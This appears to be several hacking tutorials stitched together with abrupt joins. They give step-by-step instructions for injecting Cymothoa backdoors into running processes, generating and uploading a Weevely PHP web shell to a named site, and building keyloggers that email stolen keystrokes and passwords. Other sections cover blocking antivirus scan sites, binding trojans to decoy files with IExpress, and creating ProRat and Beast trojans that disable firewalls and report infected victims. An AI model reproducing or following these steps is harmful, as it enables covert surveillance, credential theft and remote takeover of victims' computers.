Open your backtrack terminal and type cd /pentest/backdoors/cymothoa

Not type. /cymothoa

The main syntax is:  ./cymothoa –p <pid> -s <shellcode_number> [options]

Now type. /cymothoa –S for list of all available shellcodes

To try to infect a currently running process I run to see a list of life processes type ps –aux

I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444

You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.

Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)

Open your backtrack terminal and type cd /pentest/backdoors/web/weevely

Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this

. / weevely.py generate rajchandel (Password) /root/Desktop

Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this

. / weevely http://telecallerjobs.com/webdoor.php rajchandel

Uname –a – print all information

Free – display information about free and used memory on the system

pwd – print name of current/working directory

Df – displays the amount of disk space available on the filesystem containing each file name argument

W – Displays information about the users currently on the machine, and their processes

Ls – List information about the FILEs (the current directory by default)

Open the program 

Double click on the program where you downloaded it

First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.

In the Email settings tab keep the “smpt.gmail.com” and the port number 587 where it says “Email to Send Keystroke Logs” put your email in that box and in the box under that put the password to your email. 

If you want you can change what email it send the logs too, but otherwise use the same email that you put above. 

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step. 

Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.

Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.

In the Installation Directory I would put it in the “AppData Folder

Then go to Original File Check “Do Nothing with Original File after Install” to keep suspicion level none.

If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

Now go to ‘Server Creation‘ tab and press ‘Generate New Server’ under ‘server creation’, and give name of your Keylogger and that it… You are done.

You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via email

Run the keylogger file on your pc and click on “Create new”

Now, enter the information as follows:

Email address: your email address (gmail recommended)

Account Password: Password of your Email address.

Keylogger Recipients: Enter your Email address

Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit “verify now” If you get a message saying verified, your good to go, click next.

Now enable the “Install Keylogger” by clicking on it.

Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next

Now, “Enable Website Viewer” by clicking on it.

Click on Next option.

Now, Enable the “Enable File Binder”.

Click on next

Now Enable the “Steal Password”

Click on Next

Fill all the information by yourself. And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file.

And click on “Compile Server”. Now Compile has been done.

 You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

Type iexpress

Now IExpress is open. Select ” Create new Self Extraction Directive file” then click Next

Select ” “Extract files and run an instalation command” and click Next

Choose a tittle for ur package and click Next

Select No prompt and click Next

Select Do not display a license and click Next

Now click Add and first select the server or keylogger or whatever you want to send to the victim. And then click on Add and select the file that u want show to the victim and click Next.

Now where it says “Install program” put the name of what you want to install on the victim’s PC, the server, the keylogger … etc.etc. and where it says “post install command” write the name of the file to be displayed to the victim and click Next

Select Hidden and click next

Select No message and click Next

Now select “Browse” and find where you want to save your new binded exe at, and then type a name for it and hit Next

Now select No restart and click Next

Select  save Self Extraction Directive

Then Click on Next and then click Finish and ur new file is created

you have now binded your server to .exe file. Now, simply send this binded file to your victim and ask him to run your binded file on his computer

Click on Create  and then Create ProRat Server

 Enter your host name or IP in the ProRat Notification If you don’t know you IP address click the red arrow and It will fill you IP address automatically.

Now open Notifications at the sidebar and select the second option “Mail Notifications” Change this to the your email address where you want to receive notifications when the server is installed into your victims computer.

Click on Bind with file on the sidebar. You can bind it with a text document or Image File

Now Click on server Icon and choose the desired icon and click on Create server.

The server gets installed silently in the computer background and the hacker will be sent a notification to the email address he described in the notification tab whenever the victim is infected

Step 2:- Open the software

Step 3:- Now click on “Build server “button.

Step 4:- Now in this window click on the notifications tab.

Step 5:- In the notifications tab click on the e-mail button.

Step 6:- Now In this window fill your proper and valid email id.

Step 7:- Now go to “AV-FW kill” tab.

Step 8: – Now In this put a tick mark on the “disable XP firewall “.

Step 9:-Now click on “EXE icon” tab.

Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.

Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After That Click on the “Go Beast” Button and You will be connected to victims PC.